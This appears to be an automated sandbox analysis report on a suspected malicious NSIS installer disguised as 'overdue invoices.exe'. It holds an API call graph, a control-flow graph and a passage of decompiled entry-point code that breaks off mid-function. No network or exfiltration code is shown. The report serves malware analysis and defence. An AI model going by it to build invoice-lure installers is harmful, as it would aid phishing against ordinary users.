lstrcpynA 3969->3974 3971 401b48 3976 405a85 lstrcpynA 3971->3976 3973->3969 3974->3971 3975->3966 3976->3962 3977 402607 3978 40260a 3977->3978 3982 402622 3977->3982 3979 402617 FindNextFileA 3978->3979 3980 402661 3979->3980 3979->3982 3983 405a85 lstrcpynA 3980->3983 3983->3982 3502 401389 3504 401390 3502->3504 3503 4013fe 3504->3503 3505 4013cb MulDiv SendMessageA 3504->3505 3505->3504 4255 401c8a 4256 4029cb 18 API calls 4255->4256 4257 401c91 4256->4257 4258 4029cb 18 API calls 4257->4258 4259 401c99 GetDlgItem 4258->4259 4260 4024aa 4259->4260 4261 40248e 4262 4029e8 18 API calls 4261->4262 4263 402495 4262->4263 4266 40575c GetFileAttributesA CreateFileA 4263->4266 4265 4024a1 4266->4265 3991 402012 3992 4029e8 18 API calls 3991->3992 3993 402019 3992->3993 3994 4029e8 18 API calls 3993->3994 3995 402023 3994->3995 3996 4029e8 18 API calls 3995->3996 3997 40202c 3996->3997 3998 4029e8 18 API calls 3997->3998 3999 402036 3998->3999 4000 4029e8 18 API calls 3999->4000 4002 402040 4000->4002 4001 402054 CoCreateInstance 4006 402073 4001->4006 4007 402129 4001->4007 4002->4001 4003 4029e8 18 API calls 4002->4003 4003->4001 4004 401423 25 API calls 4005 40215b 4004->4005 4006->4007 4008 402108 MultiByteToWideChar 4006->4008 4007->4004 4007->4005 4008->4007 4009 402215 4010 402223 4009->4010 4011 40221d 4009->4011 4013 4029e8 18 API calls 4010->4013 4014 402233 4010->4014 4012 4029e8 18 API calls 4011->4012 4012->4010 4013->4014 4016 4029e8 18 API calls 4014->4016 4017 402241 4014->4017 4015 4029e8 18 API calls 4018 40224a WritePrivateProfileStringA 4015->4018 4016->4017 4017->4015 4267 401e95 4268 4029e8 18 API calls 4267->4268 4269 401e9c 4268->4269 4270 405d7c 2 API calls 4269->4270 4271 401ea2 4270->4271 4273 401eb4 4271->4273 4274 4059e3 wsprintfA 4271->4274 4274->4273 4275 401595 4276 4029e8 18 API calls 4275->4276 4277 40159c SetFileAttributesA 4276->4277 4278 4015ae 4277->4278 4279 401d95 4280 4029cb 18 API calls 4279->4280 4281 401d9b 4280->4281 4282 4029cb 18 API calls 4281->4282 4283 401da4 4282->4283 4284 401db6 EnableWindow 4283->4284 4285 401dab ShowWindow 4283->4285 4286 40287d 4284->4286 4285->4286 4287 401696 4288 4029e8 18 API calls 4287->4288 4289 40169c GetFullPathNameA 4288->4289 4292 4016b3 4289->4292 4296 4016d4 4289->4296 4290 4016e8 GetShortPathNameA 4291 40287d 4290->4291 4293 405d7c 2 API calls 4292->4293 4292->4296 4294 4016c4 4293->4294 4294->4296 4297 405a85 lstrcpynA 4294->4297 4296->4290 4296->4291 4297->4296 4019 402419 4029 402af2 4019->4029 4021 402423 4022 4029cb 18 API calls 4021->4022 4023 40242c 4022->4023 4024 402443 RegEnumKeyA 4023->4024 4025 40244f RegEnumValueA 4023->4025 4026 40264e 4023->4026 4027 402468 RegCloseKey 4024->4027 4025->4026 4025->4027 4027->4026 4030 4029e8 18 API calls 4029->4030 4031 402b0b 4030->4031 4032 402b19 RegOpenKeyExA 4031->4032 4032->4021 4305 402299 4306 4022c9 4305->4306 4307 40229e 4305->4307 4309 4029e8 18 API calls 4306->4309 4308 402af2 19 API calls 4307->4308 4310 4022a5 4308->4310 4311 4022d0 4309->4311 4312 4029e8 18 API calls 4310->4312 4315 4022e6 4310->4315 4316 402a28 RegOpenKeyExA 4311->4316 4314 4022b6 RegDeleteValueA RegCloseKey 4312->4314 4314->4315 4317 402a53 4316->4317 4324 402a9f 4316->4324 4318 402a79 RegEnumKeyA 4317->4318 4319 402a8b RegCloseKey 4317->4319 4320 402ab0 RegCloseKey 4317->4320 4322 402a28 3 API calls 4317->4322 4318->4317 4318->4319 4321 405da3 3 API calls 4319->4321 4320->4324 4323 402a9b 4321->4323 4322->4317 4323->4324 4325 402acb RegDeleteKeyA 4323->4325 4324->4315 4325->4324 4033 401e1b 4034 4029e8 18 API calls 4033->4034 4035 401e21 4034->4035 4036 404e23 25 API calls 4035->4036 4037 401e2b 4036->4037 4038 4052e5 2 API calls 4037->4038 4042 401e31 4038->4042 4039 401e87 CloseHandle 4041 40264e 4039->4041 4040 401e50 WaitForSingleObject 4040->4042 4043 401e5e GetExitCodeProcess 4040->4043 4042->4039 4042->4040 4042->4041 4044 405ddc 2 API calls 4042->4044 4045 401e70 4043->4045 4046 401e79 4043->4046 4044->4040 4048 4059e3 wsprintfA 4045->4048 4046->4039 4048->4046 4049 401d1b GetDC GetDeviceCaps 4050 4029cb 18 API calls 4049->4050 4051 401d37 MulDiv 4050->4051 4052 4029cb 18 API calls 4051->4052 4053 401d4c 4052->4053 4054 405aa7 18 API calls 4053->4054 4055 401d85 CreateFontIndirectA 4054->4055 4056 4024aa 4055->4056 3039 401721 3040 4029e8 18 API calls 3039->3040 3041 401728 3040->3041 3045 40578b 3041->3045 3043 40172f 3044 40578b 2 API calls 3043->3044 3044->3043 3046 405796 GetTickCount GetTempFileNameA 3045->3046 3047 4057c2 3046->3047 3048 4057c6 3046->3048 3047->3046 3047->3048 3048->3043 4326 4023a1 4327 402af2 19 API calls 4326->4327 4328 4023ab 4327->4328 4329 4029e8 18 API calls 4328->4329 4330 4023b4 4329->4330 4331 4023be RegQueryValueExA 4330->4331 4333 40264e 4330->4333 4332 4023de 4331->4332 4334 4023e4 RegCloseKey 4331->4334 4332->4334 4337 4059e3 wsprintfA 4332->4337 4334->4333 4337->4334 4057 401922 4058 4029e8 18 API calls 4057->4058 4059 401929 lstrlenA 4058->4059 4060 4024aa 4059->4060 3188 403225 #17 SetErrorMode OleInitialize 3258 405da3 GetModuleHandleA 3188->3258 3192 403293 GetCommandLineA 3263 405a85 lstrcpynA 3192->3263 3194 4032a5 GetModuleHandleA 3195 4032bc 3194->3195 3196 4055a3 CharNextA 3195->3196 3197 4032d0 CharNextA 3196->3197 3205 4032dd 3197->3205 3198 403346 3199 403359 GetTempPathA 3198->3199 3264 4031f1 3199->3264 3201 40336f 3202 403393 DeleteFileA 3201->3202 3203 403373 GetWindowsDirectoryA lstrcatA 3201->3203 3272 402c5b GetTickCount GetModuleFileNameA 3202->3272 3206 4031f1 11 API calls 3203->3206 3204 4055a3 CharNextA 3204->3205 3205->3198 3205->3204 3209 403348 3205->3209 3208 40338f 3206->3208 3208->3202 3212 40340d 3208->3212 3357 405a85 lstrcpynA 3209->3357 3210 4033a4 3210->3212 3213 4033fd 3210->3213 3216 4055a3 CharNextA 3210->3216 3374 4035a6 3212->3374 3302 4035e3 3213->3302 3218 4033bb 3216->3218 3227 4033d8 3218->3227 3228 40343c lstrcatA lstrcmpiA 3218->3228 3219 403426 3222 405346 MessageBoxIndirectA 3219->3222 3220 40350b 3221 40358e ExitProcess 3220->3221 3223 405da3 3 API calls 3220->3223 3225 403434 ExitProcess 3222->3225 3226 40351a 3223->3226 3229 405da3 3 API calls 3226->3229 3358 405659 3227->3358 3228->3212 3231 403458 CreateDirectoryA SetCurrentDirectoryA 3228->3231 3232 403523 3229->3232 3234 40347a 3231->3234 3235 40346f 3231->3235 3236 405da3 3 API calls 3232->3236 3382 405a85 lstrcpynA 3234->3382 3381 405a85 lstrcpynA 3235->3381 3239 40352c 3236->3239 3241 40357a ExitWindowsEx 3239->3241 3248 40353a GetCurrentProcess 3239->3248 3241->3221 3244 403587 3241->3244 3242 4033f2 3373 405a85 lstrcpynA 3242->3373 3243 405aa7 18 API calls 3246 4034aa DeleteFileA 3243->3246 3412 40140b 3244->3412 3249 4034b7 CopyFileA 3246->3249 3255 403488 3246->3255 3250 40354a 3248->3250 3249->3255 3250->3241 3251 4034ff 3253 4057d3 38 API calls 3251->3253 3253->3212 3254 405aa7 18 API calls 3254->3255 3255->3243 3255->3251 3255->3254 3257 4034eb CloseHandle 3255->3257 3383 4057d3 3255->3383 3409 4052e5 CreateProcessA 3255->3409 3257->3255 3259 405dca GetProcAddress 3258->3259 3260 405dbf LoadLibraryA 3258->3260 3261 403268 SHGetFileInfoA 3259->3261 3260->3259 3260->3261 3262 405a85 lstrcpynA 3261->3262 3262->3192 3263->3194 3265 405ce3 5 API calls 3264->3265 3266 4031fd 3265->3266 3267 403207 3266->3267 3268 405578 3 API calls 3266->3268 3267->3201 3269 40320f CreateDirectoryA 3268->3269 3270 40578b 2 API calls 3269->3270 3271 403223 3270->3271 3271->3201 3415 40575c GetFileAttributesA CreateFileA 3272->3415 3274 402c9e 3301 402cab 3274->3301 3416 405a85 lstrcpynA 3274->3416 3276 402cc1 3417 4055bf lstrlenA 3276->3417 3280 402cd2 GetFileSize 3281 402dd3 3280->3281 3299 402ce9 3280->3299 3282 402bc5 32 API calls 3281->3282 3284 402dda 3282->3284 3283 4031a8 ReadFile 3283->3299 3286 402e16 GlobalAlloc 3284->3286 3284->3301 3422 4031da SetFilePointer 3284->3422 3285 402e6e 3288 402bc5 32 API calls 3285->3288 3287 402e2d 3286->3287 3292 40578b 2 API calls 3287->3292 3288->3301 3290 402df7 3293 4031a8 ReadFile 3290->3293 3291 402bc5 32 API calls 3291->3299 3295 402e3e CreateFileA 3292->3295 3294 402e02 3293->3294 3294->3286 3294->3301 3296 402e78 3295->3296 3295->3301 3423 4031da SetFilePointer 3296->3423 3298 402e86 3300 402f01 47 API calls 3298->3300 3299->3281 3299->3283 3299->3285 3299->3291 3299->3301 3300->3301 3301->3210 3303 405da3 3 API calls 3302->3303 3304 4035f7 3303->3304 3305 4035fd 3304->3305 3306 40360f 3304->3306 3433 4059e3 wsprintfA 3305->3433 3307 40596c 3 API calls 3306->3307 3308 403630 3307->3308 3310 40364e lstrcatA 3308->3310 3312 40596c 3 API calls 3308->3312 3311 40360d 3310->3311 3424 403897 3311->3424 3312->3310 3315 405659 18 API calls 3316 403676 3315->3316 3317 4036ff 3316->3317 3319 40596c 3 API calls 3316->3319 3318 405659 18 API calls 3317->3318 3320 403705 3318->3320 3321 4036a2 3319->3321 3322 403715 LoadImageA 3320->3322 3323 405aa7 18 API calls 3320->3323 3321->3317 3326 4036be lstrlenA 3321->3326 3330 4055a3 CharNextA 3321->3330 3324 403740 RegisterClassA 3322->3324 3325 4037c9 3322->3325 3323->3322 3327 40377c SystemParametersInfoA CreateWindowExA 3324->3327 3328 4037d3 3324->3328 3329 40140b 2 API calls 3325->3329 3331 4036f2 3326->3331 3332 4036cc lstrcmpiA 3326->3332 3327->3325 3328->3212 3336 4037cf 3329->3336 3334 4036bc 3330->3334 3333 405578 3 API calls 3331->3333 3332->3331 3335 4036dc GetFileAttributesA 3332->3335 3338 4036f8 3333->3338 3334->3326 3339 4036e8 3335->3339 3336->3328 3337 403897 19 API calls 3336->3337 3340 4037e0 3337->3340 3434 405a85 lstrcpynA 3338->3434 3339->3331 3342 4055bf 2 API calls 3339->3342 3343 403864 3340->3343 3344 4037e8 ShowWindow LoadLibraryA 3340->3344 3342->3331 3435 404ef5 OleInitialize 3343->3435 3345 403807 LoadLibraryA 3344->3345 3346 40380e GetClassInfoA 3344->3346 3345->3346 3348 403822 GetClassInfoA RegisterClassA 3346->3348 3349 403838 DialogBoxParamA 3346->3349 3348->3349 3351 40140b 2 API calls 3349->3351 3350 40386a 3352 403886 3350->3352 3353 40386e 3350->3353 3355 403860 3351->3355 3354 40140b 2 API calls 3352->3354 3353->3328 3356 40140b 2 API calls 3353->3356 3354->3328 3355->3328 3356->3328 3357->3199 3450 405a85 lstrcpynA 3358->3450 3360 40566a 3361 40560c 4 API calls 3360->3361 3362 405670 3361->3362 3363 4033e3 3362->3363 3364 405ce3 5 API calls 3362->3364 3363->3212 3372 405a85 lstrcpynA 3363->3372 3369 405680 3364->3369 3365 4056ab lstrlenA 3366 4056b6 3365->3366 3365->3369 3367 405578 3 API calls 3366->3367 3370 4056bb GetFileAttributesA 3367->3370 3368 405d7c 2 API calls 3368->3369 3369->3363 3369->3365 3369->3368 3371 4055bf 2 API calls 3369->3371 3370->3363 3371->3365 3372->3242 3373->3213 3375 4035c1 3374->3375 3376 4035b7 CloseHandle 3374->3376 3377 4035d5 3375->3377 3378 4035cb CloseHandle 3375->3378 3376->3375 3451 4053aa 3377->3451 3378->3377 3381->3234 3382->3255 3384 405da3 3 API calls 3383->3384 3385 4057de 3384->3385 3386 40583b GetShortPathNameA 3385->3386 3389 405930 3385->3389 3494 40575c GetFileAttributesA CreateFileA 3385->3494 3388 405850 3386->3388 3386->3389 3388->3389 3391 405858 wsprintfA 3388->3391 3389->3255 3390 40581f CloseHandle GetShortPathNameA 3390->3389 3392 405833 3390->3392 3393 405aa7 18 API calls 3391->3393 3392->3386 3392->3389 3394 405880 3393->3394 3495 40575c GetFileAttributesA CreateFileA 3394->3495 3396 40588d 3396->3389 3397 40589c GetFileSize GlobalAlloc 3396->3397 3398 405929 CloseHandle 3397->3398 3399 4058ba ReadFile 3397->3399 3398->3389 3399->3398 3400 4058ce 3399->3400 3400->3398 3496 4056d1 lstrlenA 3400->3496 3403 4058e3 3501 405a85 lstrcpynA 3403->3501 3404 40593d 3405 4056d1 4 API calls 3404->3405 3407 4058f1 3405->3407 3408 405904 SetFilePointer WriteFile GlobalFree 3407->3408 3408->3398 3410 405320 3409->3410 3411 405314 CloseHandle 3409->3411 3410->3255 3411->3410 3413 401389 2 API calls 3412->3413 3414 401420 3413->3414 3414->3221 3415->3274 3416->3276 3418 4055cc 3417->3418 3419 4055d1 CharPrevA 3418->3419 3420 402cc7 3418->3420 3419->3418 3419->3420 3421 405a85 lstrcpynA 3420->3421 3421->3280 3422->3290 3423->3298 3425 4038ab 3424->3425 3442 4059e3 wsprintfA 3425->3442 3427 40391c 3428 405aa7 18 API calls 3427->3428 3429 403928 SetWindowTextA 3428->3429 3430 403944 3429->3430 3431 40365e 3429->3431 3430->3431 3432 405aa7 18 API calls 3430->3432 3431->3315 3432->3430 3433->3311 3434->3317 3443 403e83 3435->3443 3437 404f18 3441 404f3f 3437->3441 3446 401389 3437->3446 3438 403e83 SendMessageA 3439 404f51 OleUninitialize 3438->3439 3439->3350 3441->3438 3442->3427 3444 403e9b 3443->3444 3445 403e8c SendMessageA 3443->3445 3444->3437 3445->3444 3448 401390 3446->3448 3447 4013fe 3447->3437 3448->3447 3449 4013cb MulDiv SendMessageA 3448->3449 3449->3448 3450->3360 3452 405659 18 API calls 3451->3452 3453 4053be 3452->3453 3454 4053c7 DeleteFileA 3453->3454 3455 4053de 3453->3455 3456 403416 OleUninitialize 3454->3456 3457 40551d 3455->3457 3492 405a85 lstrcpynA 3455->3492 3456->3219 3456->3220 3457->3456 3464 405d7c 2 API calls 3457->3464 3459 405408 3460 405419 3459->3460 3461 40540c lstrcatA 3459->3461 3463 4055bf 2 API calls 3460->3463 3462 40541f 3461->3462 3465 40542d lstrcatA 3462->3465 3467 405438 lstrlenA FindFirstFileA 3462->3467 3463->3462 3466 405538 3464->3466 3465->3467 3466->3456 3469 405578 3 API calls 3466->3469 3468 405513 3467->3468 3489 40545c 3467->3489 3468->3457 3471 405542 3469->3471 3470 4055a3 CharNextA 3470->3489 3472 40573d 2 API calls 3471->3472 3473 405548 RemoveDirectoryA 3472->3473 3474 405553 3473->3474 3475 40556a 3473->3475 3474->3456 3477 405559 3474->3477 3478 404e23 25 API calls 3475->3478 3480 404e23 25 API calls 3477->3480 3478->3456 3479 4054f2 FindNextFileA 3481 40550a FindClose 3479->3481 3479->3489 3482 405561 3480->3482 3481->3468 3483 4057d3 38 API calls 3482->3483 3486 405568 3483->3486 3484 40573d 2 API calls 3487 4054bf DeleteFileA 3484->3487 3485 4053aa 59 API calls 3485->3489 3486->3456 3487->3489 3488 404e23 25 API calls 3488->3479 3489->3470 3489->3479 3489->3484 3489->3485 3489->3488 3490 404e23 25 API calls 3489->3490 3491 4057d3 38 API calls 3489->3491 3493 405a85 lstrcpynA 3489->3493 3490->3489 3491->3489 3492->3459 3493->3489 3494->3390 3495->3396 3497 405707 lstrlenA 3496->3497 3498 4056e5 lstrcmpiA 3497->3498 3499 405711 3497->3499 3498->3499 3500 4056fe CharNextA 3498->3500 3499->3403 3499->3404 3500->3497 3501->3407 4338 401ca5 4339 4029cb 18 API calls 4338->4339 4340 401cb5 SetWindowLongA 4339->4340 4341 40287d 4340->4341 4061 401a26 4062 4029cb 18 API calls 4061->4062 4063 401a2c 4062->4063 4064 4029cb 18 API calls 4063->4064 4065 4019d6 4064->4065 4342 4045aa 4343 4045d6 4342->4343 4344 4045ba 4342->4344 4346 404609 4343->4346 4347 4045dc SHGetPathFromIDListA 4343->4347 4353 40532a GetDlgItemTextA 4344->4353 4348 4045f3 SendMessageA 4347->4348 4349 4045ec 4347->4349 4348->4346 4351 40140b 2 API calls 4349->4351 4350 4045c7 SendMessageA 4350->4343 4351->4348 4353->4350 4066 402b2d 4067 402b55 4066->4067 4068 402b3c SetTimer 4066->4068 4069 402ba3 4067->4069 4070 402ba9 MulDiv 4067->4070 4068->4067 4071 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4070->4071 4071->4069 4354 401bad 4355 4029cb 18 API calls 4354->4355 4356 401bb4 4355->4356 4357 4029cb 18 API calls 4356->4357 4358 401bbe 4357->4358 4359 401bce 4358->4359 4361 4029e8 18 API calls 4358->4361 4360 401bde 4359->4360 4362 4029e8 18 API calls 4359->4362 4363 401be9 4360->4363 4364 401c2d 4360->4364 4361->4359 4362->4360 4365 4029cb 18 API calls 4363->4365 4366 4029e8 18 API calls 4364->4366 4367 401bee 4365->4367 4368 401c32 4366->4368 4369 4029cb 18 API calls 4367->4369 4370 4029e8 18 API calls 4368->4370 4371 401bf7 4369->4371 4372 401c3b FindWindowExA 4370->4372 4373 401c1d SendMessageA 4371->4373 4374 401bff SendMessageTimeoutA 4371->4374 4375 401c59 4372->4375 4373->4375 4374->4375 4073 40422e 4074 404264 4073->4074 4075 40423e 4073->4075 4076 403e9e 8 API calls 4074->4076 4077 403e37 19 API calls 4075->4077 4079 404270 4076->4079 4078 40424b SetDlgItemTextA 4077->4078 4078->4074 4080 402630 4081 4029e8 18 API calls 4080->4081 4082 402637 FindFirstFileA 4081->4082 4083 40265a 4082->4083 4084 40264a 4082->4084 4085 402661 4083->4085 4088 4059e3 wsprintfA 4083->4088 4089 405a85 lstrcpynA 4085->4089 4088->4085 4089->4084 4376 4024b0 4377 4024b5 4376->4377 4378 4024c6 4376->4378 4379 4029cb 18 API calls 4377->4379 4380 4029e8 18 API calls 4378->4380 4381 4024bc 4379->4381 4382 4024cd lstrlenA 4380->4382 4383 4024ec WriteFile 4381->4383 4384 40264e 4381->4384 4382->4381 4383->4384 3049 4015b3 3050 4029e8 18 API calls 3049->3050 3051 4015ba 3050->3051 3067 40560c CharNextA CharNextA 3051->3067 3053 4015c2 3054 40160a 3053->3054 3057 4055a3 CharNextA 3053->3057 3055 40162d 3054->3055 3056 40160f 3054->3056 3060 401423 25 API calls 3055->3060 3058 401423 25 API calls 3056->3058 3059 4015d0 CreateDirectoryA 3057->3059 3061 401616 3058->3061 3059->3053 3062 4015e5 GetLastError 3059->3062 3065 40215b 3060->3065 3073 405a85 lstrcpynA 3061->3073 3062->3053 3064 4015f2 GetFileAttributesA 3062->3064 3064->3053 3066 401621 SetCurrentDirectoryA 3066->3065 3068 405632 3067->3068 3069 405626 3067->3069 3071 4055a3 CharNextA 3068->3071 3072 40564f 3068->3072 3069->3068 3070 40562d CharNextA 3069->3070 3070->3072 3071->3068 3072->3053 3073->3066 3074 401734 3075 4029e8 18 API calls 3074->3075 3076 40173b 3075->3076 3077 401761 3076->3077 3078 401759 3076->3078 3129 405a85 lstrcpynA 3077->3129 3128 405a85 lstrcpynA 3078->3128 3081 40175f 3085 405ce3 5 API calls 3081->3085 3082 40176c 3130 405578 lstrlenA CharPrevA 3082->3130 3089 40177e 3085->3089 3090 401795 CompareFileTime 3089->3090 3091 401859 3089->3091 3092 401830 3089->3092 3095 405a85 lstrcpynA 3089->3095 3101 405aa7 18 API calls 3089->3101 3112 40575c GetFileAttributesA CreateFileA 3089->3112 3133 405d7c FindFirstFileA 3089->3133 3136 40573d GetFileAttributesA 3089->3136 3139 405346 3089->3139 3090->3089 3093 404e23 25 API calls 3091->3093 3094 404e23 25 API calls 3092->3094 3102 401845 3092->3102 3096 401863 3093->3096 3094->3102 3095->3089 3113 402f01 3096->3113 3099 40188a SetFileTime 3100 40189c FindCloseChangeNotification 3099->3100 3100->3102 3103 4018ad 3100->3103 3101->3089 3104 4018b2 3103->3104 3105 4018c5 3103->3105 3106 405aa7 18 API calls 3104->3106 3107 405aa7 18 API calls 3105->3107 3109 4018ba lstrcatA 3106->3109 3110 4018cd 3107->3110 3109->3110 3111 405346 MessageBoxIndirectA 3110->3111 3111->3102 3112->3089 3114 402f12 SetFilePointer 3113->3114 3115 402f2e 3113->3115 3114->3115 3143 40302c GetTickCount 3115->3143 3118 401876 3118->3099 3118->3100 3119 402f3f ReadFile 3119->3118 3120 402f5f 3119->3120 3120->3118 3121 40302c 42 API calls 3120->3121 3122 402f76 3121->3122 3122->3118 3123 402ff1 ReadFile 3122->3123 3126 402f86 3122->3126 3123->3118 3125 402fa1 ReadFile 3125->3118 3125->3126 3126->3118 3126->3125 3127 402fba WriteFile 3126->3127 3127->3118 3127->3126 3128->3081 3129->3082 3131 405592 lstrcatA 3130->3131 3132 401772 lstrcatA 3130->3132 3131->3132 3132->3081 3134 405d92 FindClose 3133->3134 3135 405d9d 3133->3135 3134->3135 3135->3089 3137 405759 3136->3137 3138 40574c SetFileAttributesA 3136->3138 3137->3089 3138->3137 3140 40535b 3139->3140 3141 4053a7 3140->3141 3142 40536f MessageBoxIndirectA 3140->3142 3141->3089 3142->3141 3144 403196 3143->3144 3145 40305b 3143->3145 3146 402bc5 32 API calls 3144->3146 3156 4031da SetFilePointer 3145->3156 3152 402f37 3146->3152 3148 403066 SetFilePointer 3153 40308b 3148->3153 3152->3118 3152->3119 3153->3152 3154 403120 WriteFile 3153->3154 3155 403177 SetFilePointer 3153->3155 3157 4031a8 ReadFile 3153->3157 3159 405e9d 3153->3159 3166 402bc5 3153->3166 3154->3152 3154->3153 3155->3144 3156->3148 3158 4031c9 3157->3158 3158->3153 3160 405ec2 3159->3160 3161 405eca 3159->3161 3160->3153 3161->3160 3162 405f51 GlobalFree 3161->3162 3163 405f5a GlobalAlloc 3161->3163 3164 405fd1 GlobalAlloc 3161->3164 3165 405fc8 GlobalFree 3161->3165 3162->3163 3163->3160 3163->3161 3164->3160 3164->3161 3165->3164 3167 402bd3 3166->3167 3168 402beb 3166->3168 3169 402be3 3167->3169 3170 402bdc DestroyWindow 3167->3170 3171 402bf3 3168->3171 3172 402bfb GetTickCount 3168->3172 3169->3153 3170->3169 3181 405ddc 3171->3181 3172->3169 3173 402c09 3172->3173 3175 402c11 3173->3175 3176 402c3e CreateDialogParamA 3173->3176 3175->3169 3185 402ba9 3175->3185 3176->3169 3178 402c1f wsprintfA 3179 404e23 25 API calls 3178->3179 3180 402c3c 3179->3180 3180->3169 3182 405df9 PeekMessageA 3181->3182 3183 405e09 3182->3183 3184 405def DispatchMessageA 3182->3184 3183->3169 3184->3182 3186 402bb8 3185->3186 3187 402bba MulDiv 3185->3187 3186->3187 3187->3178 4097 401634 4098 4029e8 18 API calls 4097->4098 4099 40163a 4098->4099 4100 405d7c 2 API calls 4099->4100 4101 401640 4100->4101 4102 401934 4103 4029cb 18 API calls 4102->4103 4104 40193b 4103->4104 4105 4029cb 18 API calls 4104->4105 4106 401945 4105->4106 4107 4029e8 18 API calls 4106->4107 4108 40194e 4107->4108 4109 401961 lstrlenA 4108->4109 4110 40199c 4108->4110 4111 40196b 4109->4111 4111->4110 4115 405a85 lstrcpynA 4111->4115 4113 401985 4113->4110 4114 401992 lstrlenA 4113->4114 4114->4110 4115->4113 4385 4019b5 4386 4029e8 18 API calls 4385->4386 4387 4019bc 4386->4387 4388 4029e8 18 API calls 4387->4388 4389 4019c5 4388->4389 4390 4019cc lstrcmpiA 4389->4390 4391 4019de lstrcmpA 4389->4391 4392 4019d2 4390->4392 4391->4392 4393 4014b7 4394 4014bd 4393->4394 4395 401389 2 API calls 4394->4395 4396 4014c5 4395->4396 4397 4025be 4398 4025c5 4397->4398 4399 40282a 4397->4399 4400 4029cb 18 API calls 4398->4400 4401 4025d0 4400->4401 4402 4025d7 SetFilePointer 4401->4402 4402->4399 4403 4025e7 4402->4403 4405 4059e3 wsprintfA 4403->4405 4405->4399

                  Executed Functions

                  Function 00403225 Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270filestringcomCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 25 403393-4033aa DeleteFileA call 402c5b 16->25 26 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->26 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 34 40333f 20->34 23 403311-403317 21->23 24 403303-40330c 21->24 31 403327-40332e 23->31 32 403319-403322 23->32 24->23 29 40330e 24->29 40 403411-403420 call 4035a6 OleUninitialize 25->40 41 4033ac-4033b2 25->41 26->25 26->40 29->23 31->20 37 403348-403354 call 405a85 31->37 32->31 36 403324 32->36 34->11 36->31 37->16 50 403426-403436 call 405346 ExitProcess 40->50 51 40350b-403511 40->51 42 403401-403408 call 4035e3 41->42 43 4033b4-4033bd call 4055a3 41->43 48 40340d 42->48 54 4033c8-4033ca 43->54 48->40 52 403513-403530 call 405da3 * 3 51->52 53 40358e-403596 51->53 80 403532-403534 52->80 81 40357a-403585 ExitWindowsEx 52->81 57 403598 53->57 58 40359c-4035a0 ExitProcess 53->58 59 4033cc-4033d6 54->59 60 4033bf-4033c5 54->60 57->58 64 4033d8-4033e5 call 405659 59->64 65 40343c-403456 lstrcatA lstrcmpiA 59->65 60->59 63 4033c7 60->63 63->54 64->40 74 4033e7-4033fd call 405a85 * 2 64->74 65->40 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 83 403499-4034b5 call 405aa7 DeleteFileA 71->83 72->71 74->42 80->81 86 403536-403538 80->86 81->53 85 403587-403589 call 40140b 81->85 92 4034f6-4034fd 83->92 93 4034b7-4034c7 CopyFileA 83->93 85->53 86->81 90 40353a-40354c GetCurrentProcess 86->90 90->81 98 40354e-403570 90->98 92->83 96 4034ff-403506 call 4057d3 92->96 93->92 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->94 94->92 107 4034eb-4034f2 CloseHandle 94->107 96->40 98->81 107->92
                  C-Code - Quality: 83%
                  			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("vmklrdjtbsiifoh Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\engineer\\Desktop\\overdue invoices.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\engineer\\Desktop\\overdue invoices.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
